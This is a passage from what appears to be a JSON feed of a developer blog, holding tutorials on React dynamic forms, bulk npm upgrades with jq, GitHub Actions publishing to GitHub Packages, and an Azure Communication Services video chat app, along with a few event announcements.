onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} {page > 0 && ( <button onClick={() => setPage(page + 1)}>Next</button> )} &nbsp; {page < formData.length - 1 && ( <button onClick={() => setPage(page - 1)}>Back</button> )} </form> ); }; For navigation we’ll increment or decrement the page index that we’re on which will trigger the effect and update currentPageData, forcing a render of the new fields.\nAnd with that, the basics of our dynamic form is done, time to ship to production!\nBut in Amy’s case there were two more things that needed to be handled, let’s start with conditional fields.\nConditional fields It’s not uncommon to have a form that when an option is set other information is required from the user. This is where conditional fields come into play, and to support them let’s update our data structure a little bit:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 [ { "component": "page", "label": "Page 1", "_uid": "0c946643-5a83-4545-baea-055b27b51e8a", "fields": [ { "component": "field_group", "label": "Name", "_uid": "eb169f76-4cd9-4513-b673-87c5c7d27e02", "fields": [ { "component": "text", "label": "First Name", "type": "text", "_uid": "5b9b79d2-32f2-42a1-b89f-203dfc0b6b98" }, { "component": "text", "label": "Last Name", "type": "text", "_uid": "6eff3638-80a7-4427-b07b-4c1be1c6b186" } ] }, { "component": "text", "label": "Email", "type": "email", "_uid": "7f885969-f8ba-40b9-bf5d-0d57bc9c6a8d" }, { "component": "text", "label": "Phone", "type": "text", "_uid": "f61233e8-565e-43d0-9c14-7d7f220c6020" } ] }, { "component": "page", "label": "Page 2", "_uid": "3a30803f-135f-442c-ab6e-d44d7d7a5164", "fields": [ { "component": "options", "label": "Radio Buttons", "type": "radio", "_uid": "bd90f44a-d479-49ae-ad66-c2c475dca66b", "options": [ { "component": "option", "label": "Option 1", "value": "one" }, { "component": "option", "label": "Option 2", "value": "two" } ] }, { "component": "text", "label": "Conditional Field", "type": "text", "_uid": "bd90f44a-d479-49ae-ad66-c2c475daa66b", "conditional": { "value": "two", "field": "3a30803f-135f-442c-ab6e-d44d7d7a5164_bd90f44a-d479-49ae-ad66-c2c475dca66b" } } ] } ] We’ve added a second page and the last field on the page has a new property on it, conditional, that has two properties, value being the value that the field must have to force a display and field is the field that should have that value, made up of the uid of the page and field.\nNow we’re going to have to update our rendering logic to make sure we only render the fields that should be displayed. We’ll start by creating a function that returns whether a field should be rendered or not:\n1 2 3 4 5 6 7 8 const fieldMeetsCondition = values => field => { if (field.conditional && field.conditional.field) { const segments = field.conditional.field.split("_"); const fieldId = segments[segments.length - 1]; return values[fieldId] === field.conditional.value; } return true; }; The fieldMeetsCondition function is a function that returns a function, sort of like partial application in F#, we do this so that we can simplify how it’s passed to the Array.filter before the Array.map call.\nWithin the function it will attempt to find the field in the values dictionary and match it with the required value. If no condition exists then we’ll bail out and render the field.\nNow we can update our render logic:\n1 2 3 4 5 6 7 8 // snip return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields .filter(fieldMeetsCondition(values)) .map((field) => { // snip And we’re conditionally showing fields based on user input. Now to conditionally show pages.\nConditional pages The last requirement Amy had was to be able to display steps based on the user input, so that steps could be skipped if they aren’t relevant. This is a little trickier than conditional fields, as we can no longer just increment the page index, we’ll need to search for the appropriate page index.\nLet’s extract a function to work out the next/previous process:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const navigatePages = direction => () => { const findNextPage = page => { const upcomingPageData = formData[page]; if ( upcomingPageData.conditional && upcomingPageData.conditional.field ) { const segments = upcomingPageData.conditional.field.split("_"); const fieldId = segments[segments.length - 1]; const fieldToMatchValue = values[fieldId]; if (fieldToMatchValue !== upcomingPageData.conditional.value) { return findNextPage(direction === "next" ? page + 1 : page - 1); } } return page; }; setPage(findNextPage(direction === "next" ? page + 1 : page - 1)); }; const nextPage = navigatePages("next"); const prevPage = navigatePages("prev"); Again, we’ll use a function that returns a function, but this time we’ll pass in the direction of navigation, next or prev, and then it’ll work out whether to + or -, allowing us to reuse the function.\nThis function contains a recursive function called findNextPage that when the button is clicked we’ll call to start our discovery process. Within that function we’ll grab the next sequential page and if it doesn’t have any conditional information, we’ll return the index of it. If it does have a conditional field, we’ll unpack it in a similar fashion to the conditional field test and compare the required value to the user value, and if they don’t match, we’ll go to the next (or previous) page in the stack. We’ll repeat the process again until we find a page that meets the condition or a page without a condition.\nNote: There is a limitation here, if you start or end with conditional fields you can end up exceeding the index range because it doesn’t check if you’re hitting the edges. That is something you can tackle yourself.\nConclusion Throughout this post we’ve taken a look at how we can use React to create a dynamic form, starting with what state we need to store as React Hooks, how we can handle the user input with Controlled Components and eventually implemented conditional logic for showing fields and navigating between steps.\nYou can check out the full sample on Codesandbox:\n", "id": "2020-12-10-dynamic-forms-with-react-hooks" }, { "title": "Static Web Apps on DevOps Labs", "url": "https://www.aaron-powell.com/posts/2020-12-07-static-web-apps-on-devops-labs/", "date": "Mon, 07 Dec 2020 10:38:05 +1100", "tags": [ "serverless", "webdev", "javascript" ], "description": "Check out my session on DevOps Labs about Static Web Apps", "content": "A few weeks ago I sat down with Damian Brady (in our respective home offices 😂) to talk about Azure Static Web Apps for the DevOps Lab show.\nCheck out the session, with demo failures and all!\nNo really, we didn’t mean for the build to be broken, but it worked well!\n", "id": "2020-12-07-static-web-apps-on-devops-labs" }, { "title": "Bulk Updating Outdated npm Packages", "url": "https://www.aaron-powell.com/posts/2020-11-23-bulk-updating-outdated-npm-packages/", "date": "Mon, 23 Nov 2020 11:50:18 +1100", "tags": [ "javascript" ], "description": "Coming to a project with a lot of dependencies to update? Here's how to script it", "content": "Ever come back to a project you haven’t touched for a while, only to find out there’s a lot of outdated npm packages that you want to update? This is a situation I occasionally find myself in and I’d never thought of a good way to tackle it.\nFinding Outdated Packages First off, how do you know what’s outdated? We can use npm outdated for that and it’ll return something like this:\nIf you want some more information you can provide the --long flag and get more output, such as whether the package is in the dependencies or devDependencies list:\nIf the update is within the semver filter you have in your package.json, it’s easy to upgrade with npm upgrade, but if you’re in a situation like I found myself in from the above list, there’s a lot of major version upgrades needing to be done, and since they are beyond the allowed semver range it’s a non-starter.\nUpgrading Beyond SemVer Ranges How do we go upgrading beyond our allowed semver range? By treating it as a new install and specifying the @latest tag (or specific version), like so:\n1 npm install typescript@latest Doing this will install the latest version of TypeScript (4.1.2 at the time of writing) which is a major version “upgrade”, and it’s easy enough to do if you’ve only got one or two packages to upgrade, but I was looking at 19 packages in my repo to upgrade, so it would be a lot of copy/pasting.\nUpgrading from Output Something worth noting about the npm outdated command is that if you pass --json it will return you a JSON output, rather than a human readable one, and this got me thinking.\nIf we’ve got JSON, we can use jq to manipulate it and build up a command to run from the command line.\nThe output JSON from npm outdated --json --long is going to look like this:\n1 2 3 4 5 6 7 8 9 10 { "@types/istanbul-lib-report": { "current": "1.1.1", "wanted": "1.1.1", "latest": "3.0.0", "location": "node_modules/@types/istanbul-lib-report", "type": "devDependencies", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped#readme" } } We’re starting with an object, but we want to treat each sub-object as a separate node in the data set, we’ll turn it into an array using to_entities, which gives us this new output:\n1 2 3 4 5 6 7 8 9 10 11 12 13 [ { "key": "@types/istanbul-lib-report", "value": { "current": "1.1.1", "wanted": "1.1.1", "latest": "3.0.0", "location": "node_modules/@types/istanbul-lib-report", "type": "devDependencies", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped#readme" } } ] This gives us a dictionary where the key is the package name and value is the information about the upgrade for the package. As it’s now an array we can choose to filter it using whatever heuristics we want, and for the moment we’ll upgrade the dependencies separate from the devDependencies. We do that using the select function in jq:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies")' The select function allows you to do whatever filtering you want, for example if you wanted to only update the TypeScript type definitions you could change the select to be select(.key | startswith("@types")).\nRunning this will give you a filtered output on the terminal, showing only the packages that match your select condition. The last step is to generate the new package install version:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' This update specified the @latest tag, but you could use .key + "@" + .value.latest if you wanted to install the specific version for more tighter semver pinning. The output in the terminal will now look like this:\n1 "@types/istanbul-lib-report@latest" All that’s left to do is to pass the packages to npm install, so you’d possibly think we can just pipe the output:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' | npm install Unfortunately, npm install doesn’t accept command line arguments provided by standard input, so instead we’ll use xargs to convert the standard input into command line arguments:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' | xargs npm install And with that, our upgrade is fully underway!\nConclusion I’m going to keep this snippet handy for when I’m coming back to projects that I haven’t worked on for a while, as it’s an easy way to do a large number of updated.\nAn alternative option you can look at is npm-check-updates, which is a command line utility that will update in a similar manner to above, but also has other feature to how it controls updates.\n", "id": "2020-11-23-bulk-updating-outdated-npm-packages" }, { "title": "5 Key Things From dotnet 5", "url": "https://www.aaron-powell.com/posts/2020-11-12-5-key-things-from-dotnet-5/", "date": "Thu, 12 Nov 2020 14:03:37 +1100", "tags": [ "dotnet", "public-speaking" ], "description": "Want to learn some of the best parts of .NET 5? Join me at Devs Speak", "content": "With .NET 5 being launched and a multi-day event covering all things new, it’s easy to get lost trying to wade through all of the announcements.\nBut don’t stress, I’ll be covering off the 5 things I think are most exciting from the launch at Devs Speak on the 20th Nov (5pm - 7pm ADST).\nGrab yourself a ticket and join me and a bunch of awesome folks from around APAC to learn all things .NET.\n", "id": "2020-11-12-5-key-things-from-dotnet-5" }, { "title": "Deploy to GitHub Packages With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2020-11-06-deploy-to-github-packages-with-github-actions/", "date": "Fri, 06 Nov 2020 09:25:07 +1100", "tags": [ "devops", "javascript", "dotnet" ], "description": "Let's look at how to automate releases to GitHub Packages using GitHub Actions", "content": "You’ve started a new project in which you’re creating a package to release on a package registry and you want to simplify the workflow in which you push some changes to be tested in an app, without a lot of hassle of copying local packages around.\nThe simplest solution to this is to push to npm, but that can be a bit cluttering, especially if you’re iterating quickly.\nThis is a predicament that I found myself in recently, and decided it was finally time to check out GitHub Packages. GitHub Package supports a number of different package repository formats such as npm, NuGet, Maven and Docker, and integrates directly with the existing package management tool chain. For this post, we’ll use a npm package, but the concept the same for all registry types.\nCreating a Workflow To do this workflow, we’ll use GitHub Actions as our workflow engine. I’ve blogged in the past on getting started with GitHub Actions, so if you’re new to them I’d suggest using that to brush up on the terminology and structure of a workflow file.\nStart by created a workflow file in .github/workflows and call it build.yml. We want this workflow to run every time someone pushes to the main branch, or when a PR is opened against it, so we’ll set that as our trigger:\n1 2 3 4 5 6 7 name: Node.js CI on: push: branches: [ main ] pull_request: branches: [ main ] Next, we’ll create a job that does your normal build process. Remember that this is a Node package, so it’s written for that, but swap it out for npm calls, or whatever platform you’re targeting:\n1 2 3 4 5 6 7 8 9 10 11 12 jobs: build: runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci - run: npm run lint - run: npm test Building a Package With the workflow running our standard verification checks, the next job will generate the package. Personally, I like to extract it out to a separate job so it’s clear which phase of our workflow a failure has happened. This new job will be called package and it’ll need the build job to complete first, which we specify with the needs property:\n1 2 3 4 5 6 7 8 9 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x One down-side of doing this as a separate job is that we’ll need to prepare the artifacts for the package to be created again, as they aren’t available from the build job (unless you upload them, but that might be really slow if you have a lot of dependencies), so we’ll have to get them again.\n1 2 3 4 5 6 7 8 9 10 11 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci For this example, we’re only installing the npm packages, but if it was a TypeScript project you’d want to run the tsc compilation, .NET projects would need to compile, etc.\nWith dependencies installed, it’s time to generate the package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci - run: npm version prerelease --preid=ci-$GITHUB_RUN_ID --no-git-tag-version - run: npm pack - name: Upload uses: actions/upload-artifact@v2 with: name: package path: "*.tgz" With npm we have a version command that can be used to bump the version that the package is going to be created, and you can use it to bump each part of the semver string (check out the docs for all options). Since this is happening as part of a CI build, we’ll just tag it as a pre-release package bump, and use the ID of the build as the version suffix, making it unique and auto-incrementing across builds. We’ll also give it the --no-git-tag-version flag since we don’t need to tag the commit in Git, as that tag isn’t getting pushed (but obviously you can do that if you prefer, I just wouldn’t recommend it as part of a CI build as you’d get a lot of tags!).\nIf you’re using .NET, here’s the run step I use:\n1 run: dotnet pack --configuration Release --no-build --version-suffix "-ci-$GITHUB_RUN_ID" --output .output Finally, we’ll use the upload Action to push the package to the workflow so we can download it from the workflow to do local installs, or use it in our final job to publish to GitHub Packages.\nPublishing a Package With our package created and appropriately versioned it’s time to put it in GitHub Packages. Again, we’ll use a dedicated job for this, and it’s going to depend on the package job completion:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 publish: name: "Publish to GitHub Packages" needs: [package] runs-on: ubuntu-18.04 if: github.repository_owner == 'aaronpowell' steps: - name: Upload uses: actions/download-artifact@v2 with: name: package - uses: actions/setup-node@v1 with: node-version: 14.x registry-url: https://npm.pkg.github.com/ scope: "@aaronpowell" - run: echo "registry=https://npm.pkg.github.com/@aaronpowell" >> .npmrc - run: npm publish $(ls *.tgz) env: NODE_AUTH_TOKEN: ${{secrets.GITHUB_TOKEN}} You’ll notice that here we have an if condition on the job and that it’s checking the GitHub context object to ensure that the owner is the organisation that this repo belongs to. The primary reason for this is to reduce the chance of a failed build if someone pushes a PR from a fork, it won’t have access to secrets.GITHUB_TOKEN, and as such the job would fail to publish, resulting in a failed job. You may want to tweak this condition, or remove it, depending on your exact scenario.\nThis job also doesn’t use the actions/checkout Action, since we don’t need the source code. Instead, we use actions/download-artifact to get the package file created in the package job.\nTo publish with npm, we’ll setup node, but configure it to use the GitHub Packages registry, which is https://npm.pkg.github.com/ and define the current organisation as the scope (@aaronpowell).\nWe’ll then setup the .npmrc file, specifying the registry again. This ensures that the publishing of the package will go through to the GitHub Packages endpoint, rather than the public npm registry.\nLastly, we run npm publish and since we’re publishing the package from an existing tgz, not from a folder with a package.json, we have to give it the file path. Since we don’t know what the version number is we can use ls *.tgz to get it and inline that to the command.\nQuick note, GitHub Packages only supports scoped npm packages (ref), so your package name will need to be scoped like @aaronpowell/react-foldable.\nConclusion With this done, each build will create a GitHub Package that you can use. You’ll find a full workflow example on my react-foldable project.\nThe requirement for npm packages to be scoped caught me out initially, but it’s an easy change to make, especially early on in a project.\nUltimately though, this helps give a quicker feedback loop between making a change to a package and being able to integrate it into a project, using the standard infrastructure to consume packages.\n", "id": "2020-11-06-deploy-to-github-packages-with-github-actions" }, { "title": "Building a Video Chat App, Part 3 - Displaying Video", "url": "https://www.aaron-powell.com/posts/2020-11-05-building-a-video-chat-app-part-3-displaying-video/", "date": "Thu, 05 Nov 2020 09:43:26 +1100", "tags": [ "javascript", "azure" ], "description": "We've got access to the camera, now to display the feed", "content": "On my Twitch channel we’re continuing to build our video chat application on Azure Communication Services (ACS).\nLast time we learnt how to access the camera and microphone using the ACS SDK, and today we’ll look to display that camera on the screen.\nDisplaying Video As we learnt in the last post, cameras are available via a MediaStream in the browser, which we get when the user grants us access to their cameras. With raw JavaScript this can be set as the src attribute of a <video> element and the camera feed is displayed. But there’s some orchestration code to setup and events to handle, so thankfully ACS gives us an API to work with, LocalVideoStream and Renderer.\nCreating a LocalVideoStream The LocalVideoStream type requires a VideoDeviceInfo to be provided to it, and this type is what we get back from the DeviceManager (well, we get an array of them, you then pick the one you want).\nWe’ll start by creating a new React context which will contain all the information that a user has selected for the current call.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 export type UserCallSettingsContextType = { setCurrentCamera: (camera?: VideoDeviceInfo) => void; setCurrentMic: (mic?: AudioDeviceInfo) => void; setName: (name: string) => void; setCameraEnabled: (enabled: boolean) => void; setMicEnabled: (enabled: boolean) => void; currentCamera?: VideoDeviceInfo; currentMic?: AudioDeviceInfo; videoStream?: LocalVideoStream; name: string; cameraEnabled: boolean; micEnabled: boolean; }; const nie = <T extends unknown>(_: T): void => { throw Error("Not Implemented"); }; const UserCallSettingsContext = createContext<UserCallSettingsContextType>({ setCurrentCamera: nie, setCurrentMic: nie, setName: nie, setCameraEnabled: nie, setMicEnabled: nie, name: "", cameraEnabled: false, micEnabled: false }); Note: I’ve created a stub function that throws an exception for the default hook setter functions called nie.\nThe context will provide a few other pieces of data that the user is selecting, such as their preferred mic and their name, but we’re really focusing on the videoStream which will be exposed.\nNow let’s implement the context provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 export const UserCallSettingsContextProvider = (props: { children: React.ReactNode; }) => { const [currentCamera, setCurrentCamera] = useState<VideoDeviceInfo>(); const [currentMic, setCurrentMic] = useState<AudioDeviceInfo>(); const [videoStream, setVidStream] = useState<LocalVideoStream>(); const { clientPrincipal } = useAuthenticationContext(); const [name, setName] = useState(""); const [cameraEnabled, setCameraEnabled] = useState(true); const [micEnabled, setMicEnabled] = useState(true); useEffect(() => { if (clientPrincipal && !name) { setName(clientPrincipal.userDetails); } }, [clientPrincipal, name]); useEffect(() => { // TODO - handle camera selection }, [currentCamera, videoStream]); return ( <UserCallSettingsContext.Provider value={{ setCurrentCamera, setCurrentMic, currentCamera, currentMic, videoStream, setName, name, setCameraEnabled, cameraEnabled, setMicEnabled, micEnabled }} > {props.children} </UserCallSettingsContext.Provider> ); }; export const useUserCallSettingsContext = () => useContext(UserCallSettingsContext); When the currentCamera is changed (by user selection or otherwise) we’re going to want to update the LocalVideoStream, and that’s the missing useEffect implementation. First off, we’ll need to create one if it doesn’t exist, but since we can’t create it until there’s a selected camera, we’ll check for that:\n1 2 3 4 5 6 useEffect(() => { if (currentCamera && !videoStream) { const lvs = new LocalVideoStream(currentCamera); setVidStream(lvs); } }, [currentCamera, videoStream]); Using the LocalVideoStream We’ve got ourselves a video stream, but what do we do with it? We need to create Renderer that will handle the DOM elements for us.\nLet’s create a component that uses the context to access the LocalVideoStream:\n1 2 3 4 5 6 7 const VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); return <div>Show video here</div>; }; export default VideoStream; The Renderer, which we’re going to create shortly, gives us a DOM element that we need to inject into the DOM that React is managing for us, and to do that we’ll need access to the DOM element, obtained using a ref.\n1 2 3 4 5 6 const VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef < HTMLDivElement > null; return <div ref={vidRef}>Show video here</div>; }; Since our videoStream might be null (camera is off or just unselected), we’ll only create the Renderer when needed:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 const VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef<HTMLDivElement>(null); const { renderer, setRenderer } = useState<Renderer>(); useEffect(() => { if (videoStream && !renderer) { setRenderer(new Renderer(videoStream)); } }, [videoStream, renderer]); return ( <div ref={vidRef}>Show video here</div> ); }; With the Renderer created, the next thing to do is request a view from it, which displays the camera feed. We’ll do this in a separate hook for simplicities sake:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 const VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef<HTMLDivElement>(null); const { renderer, setRenderer } = useState<Renderer>(); useEffect(() => { if (videoStream && !renderer) { setRenderer(new Renderer(videoStream)); } }, [videoStream, renderer]); useEffect(() => { if (renderer) { renderer.createView().then((view) => { vidRef.current!.appendChild(view.target); }); } return () => { if (renderer) { renderer.dispose(); } }; }, [renderer, vidRef]); return ( <div ref={vidRef}></div> ); }; The createView method from the Renderer will return a Promise<RendererView> that has information on the scaling mode and whether the video is mirrored (so you could apply your own mirror transform), as well as the target DOM element, that we can append to the children of the DOM element captured via the vidRef ref. You’ll notice that I’m doing !. before appendChild, and this is to trick the TypeScript compiler, as it doesn’t properly understand the useRef assignment. Yes, it’s true that the vidRef could be null (its default value), but that’d require the hooks and Promise to execute synchronously, which isn’t possible, so we can override the type check using the ! postfix assertion.\nChanging Camera Feeds It’s possible that someone has multiple cameras on their machine and they want to switch between them, how would you go about doing that?\nThe first thought might be that we create a new LocalVideoStream and Renderer, but it’s actually a lot simpler than that as the LocalVideoStream provides a switchSource method that will change the underlying camera source and in turn cascade that across to the Renderer.\nWe’ll update our context with that support:\n1 2 3 4 5 6 7 8 9 10 11 12 useEffect(() => { if (currentCamera && !videoStream) { const lvs = new LocalVideoStream(currentCamera); setVidStream(lvs); } else if ( currentCamera && videoStream && videoStream.getSource() !== currentCamera ) { videoStream.switchSource(currentCamera); } }, [currentCamera, videoStream]); This new conditional branch will make sure we have a camera, video stream and the selected camera isn’t already set (this was a side effect of React hooks and not something you’d necessarily need to do), and that’s all we need for switching, we don’t need to touch our Renderer at all.\nConclusion There we have it, we’re now displaying the camera feed and you can see yourself. The use of the LocalVideoStream and Renderer from the ACS SDK makes it a lot simpler to handle the events and life cycle of the objects we need to work with.\nIf you want to see the full code from the sample application we’re building, you’ll find it on my GitHub.\nIf you want to catch up on the whole episode, as well as look at how we integrate this into the overall React application, you can catch the recording on YouTube, along with the full playlist\n", "id": "2020-11-05-building-a-video-chat-app-part-3-displaying-video" }, { "title": "Building a Video Chat App, Part 2 - Accessing Cameras", "url": "https://www.aaron-powell.com/posts/2020-10-22-building-a-video-chat-app-part-2-accessing-cameras/", "date": "Thu, 22 Oct 2020 09:55:12 +1100", "tags": [ "javascript", "azure" ], "description": "Lights, camera, action! It's time to get devices for our app.", "content": "On my Twitch channel we’re continuing to build our video chat application on Azure Communication Services (ACS).\nFor today’s post, we’re going to look at the next major milestone, accessing your camera and microphone.\nHow Browsers Access Devices We’re going to use the ACS SDK to do this, but before we get there let’s first understand how we access cameras and microphones in the browser. Browsers have had this functionality for a while now, it came about as a need for the WebRTC specification, since that allows you to do what we’re doing, run a video stream through the browser, and it works using the navigator.mediaDevices API which replaced navigator.getUserMedia.\nThis API is promised based, so it works nicely with async/await, and will return us the MediaStream available to the browser.\nThere is a catch though, the user has to consent to providing access to the devices, which makes sense as you don’t want any random website to be able to access your camera and mic without you knowing about it, do you? The user will see a prompt like so:\nIn “raw JavaScript” we’d write something like this:\n1 2 3 4 5 6 7 8 navigator.mediaDevices .getUserMedia({ audio: true, video: true }) .then(function(stream) { /* use the stream */ }) .catch(function(err) { /* handle the error */ }); If the user denies the request then the catch of the promise is triggered (or if they’ve previously denied it), otherwise you’ll end up in the MediaStream for the camera/mic they have selected. The MediaStream can be provided to a <video> element and you can look at yourself.\nAccessing Devices with ACS Now that we understand the fundamentals, let’s look at how we use this in the ACS SDK to get one step closer to establishing out video call.\nWe’ll need to add some npm packages to our UI:\n1 npm install --save @azure/communication-calling @azure/communication-common With these packages, we’re going to need four APIs, AzureCommunicationUserCredential, CallClient, CallAgent and DeviceManager.\nTo make the important parts of this available throughout our application, we’re going to create a React Context to hold it, so let’s get started with that.\nDefining Our Context Let’s create a file called useCallingContext.tsx since we’ll have the context in there as well as a hook to access context, and define our context:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import { AudioDeviceInfo, CallAgent, CallClient, DeviceManager, VideoDeviceInfo } from "@azure/communication-calling"; import { AzureCommunicationUserCredential } from "@azure/communication-common"; import React, { useState, useEffect, useContext } from "react"; import useToken from "./useToken"; export type CallingProps = { micList?: AudioDeviceInfo[]; cameraList?: VideoDeviceInfo[]; callAgent?: CallAgent; deviceManager?: DeviceManager; }; const CallingContext = React.createContext<CallingProps>({}); The context will have available on it the list of cameras and mics, along with the CallAgent and DeviceManager instances since they will be useful later.\nSince the logic to setup all the data available on the context only happens once, we’ll implement the context provider within this file to, so let’s do that.\n1 2 3 4 5 6 7 8 9 export const CallingContextProvider = (props: { children: React.ReactNode; }) => { return ( <CallingContext.Provider value={/* todo */}> {props.children} </CallingContext.Provider> ); }; Lastly, we’ll expose a hook to make it easy to access the context elsewhere in the application:\n1 export const useCallingContext = () => useContext(CallingContext); Great, we’re now ready to implement the context provider.\nImplementing the Context Provider The context provider here is key, as it’s the thing that’ll be responsible for getting the devices and making them available elsewhere in our application, and for that we’re going to need some local state.\n1 2 3 4 5 6 7 8 9 export const CallingContextProvider = (props: { children: React.ReactNode; }) => { const token = useToken(); const [, setClient] = useState<CallClient>(); const [callAgent, setCallAgent] = useState<CallAgent>(); const [deviceManager, setDeviceManager] = useState<DeviceManager>(); const [cameraList, setCameraList] = useState<VideoDeviceInfo[]>(); const [micList, setMicList] = useState<AudioDeviceInfo[]>(); We’re going to need the token that is generated for the user in Part 1, and we’re doing that through a custom hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import { useState, useEffect } from "react"; export type TokenResponse = { token: string; expiresOn: Date; communicationUserId: string; }; const useToken = () => { const [token, setToken] = useState(""); useEffect(() => { const run = async () => { const res = await fetch("/api/issueToken"); const tokenResponse: TokenResponse = await res.json(); setToken(tokenResponse.token); }; run(); }, []); return token; }; export default useToken; Then we’ve got some more state for the different parts of the ACS SDK that we’re going to expose, except for the CallClient which we only need to establish the other parts of the API.\nWe’ll use an effect hook to set this up, that’ll be triggered when the token is available to us:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 useEffect(() => { const run = async (callClient: CallClient, token: string) => { const tokenCredential = new AzureCommunicationUserCredential(token); let callAgent: CallAgent | undefined = undefined; try { callAgent = await callClient.createCallAgent(tokenCredential); const deviceManager = await callClient.getDeviceManager(); const result = await deviceManager.askDevicePermission(true, true); if (result.audio) { setMicList(deviceManager.getMicrophoneList()); } if (result.video) { setCameraList(deviceManager.getCameraList()); } setCallAgent(callAgent); setDeviceManager(deviceManager); } catch { if (callAgent) { callAgent.dispose(); } } }; if (token) { const callClient = new CallClient(); setClient(callClient); run(callClient, token); } }, [token]); Ok, that’s a lot of code, let’s break it down piece by piece, starting at the bottom:\n1 2 3 4 5 if (token) { const callClient = new CallClient(); setClient(callClient); run(callClient, token); } This is a check to make sure that the user token has been issued, and once it has been we’re going to call an async function (run), because an effect hook can’t take an async function directly, and the run function is really where things happen.\nFirst off, this function is going to create the credentials for ACS from the token provided:\n1 const tokenCredential = new AzureCommunicationUserCredential(token); Next, we’ll setup a try/catch block to access the devices, and remember that the reason we’d do it this way is so that if the user declines the request to access devices, we can gracefully handle the error (the async/await unwraps a promises catch into the catch of the try/catch block).\nWe’ll create the callAgent using the credentials:\n1 callAgent = await callClient.createCallAgent(tokenCredential); We’re not actually using the callAgent yet, it’s what we use to connect to calls, but we need to create an instance of it before we access the DeviceManager. I’m unclear as to why it’s this way, and it’s something I’m going to raise with the ACS team.\nWith our callAgent created, it’s now time to access the DeviceManager, which will give us all the devices:\n1 2 3 4 5 6 7 8 9 10 const deviceManager = await callClient.getDeviceManager(); const result = await deviceManager.askDevicePermission(true, true); if (result.audio) { setMicList(deviceManager.getMicrophoneList()); } if (result.video) { setCameraList(deviceManager.getCameraList()); } From the deviceManager, which we get from callClient.getDeviceManager, we need to request permissions from the user to access their device list using askDevicePermissions. This method takes two arguments, whether you want audio and video access, and for our case we do. Assuming the user grants permissions, we can then use deviceManager.getMicrophoneList and deviceManager.getCameraList to get arrays of AudioDeviceInfo and VideoDeviceInfo that we can present to the user for their selection.\nThis is the same as if you were to call the enumerateDevices method from MediaDevices, but the SDK takes the liberty of splitting the enumerated devices into their appropriate types. What’s important to know about this is that you must call askDevicePermissions first, otherwise you’ll get an array with a single unknown device. That’s because enumerateDevices, which is what’s used internally by the SDK, accesses the available devices without prompting for consent and if consent hasn’t been provided, you can’t get the devices.\nConclusion Our React context is all ready for integration into the application. We’ve learnt how to get started using the ACS SDK and its DeviceManager to request permission for the devices and then display the full list of them.\nIf you want to catch up on the whole episode, as well as look at how we integrate this into the overall React application, you can catch the recording on YouTube, along with the full playlist\n", "id": "2020-10-22-building-a-video-chat-app-part-2-accessing-cameras" }, { "title": "Come Learn Node.js With Us", "url": "https://www.aaron-powell.com/posts/2020-10-21-come-learn-nodejs-with-us/", "date": "Wed, 21 Oct 2020 09:43:46 +1100", "tags": [ "javascript" ], "description": "First we created a JavaScript series, now it's Node.js time", "content": "Recently, we launched a JavaScript beginner YouTube series and now it’s time for another new series…\nBeginners Series to: Node.js!\nIn this free, 26 part video series, we’ll cover everything from setting up a Node project to working with the file system, to setting up APIs with Express and debugging with VS Code.\nYou can check it out on Channel9 or on YouTube.\n", "id": "2020-10-21-come-learn-nodejs-with-us" }, { "title": "Upping Your Speaker Game With Auto Posting from PowerPoint", "url": "https://www.aaron-powell.com/posts/2020-10-19-upping-your-speaker-game-with-auto-posting-from-powerpoint/", "date": "Mon, 19 Oct 2020 09:28:16 +1100", "tags": [ 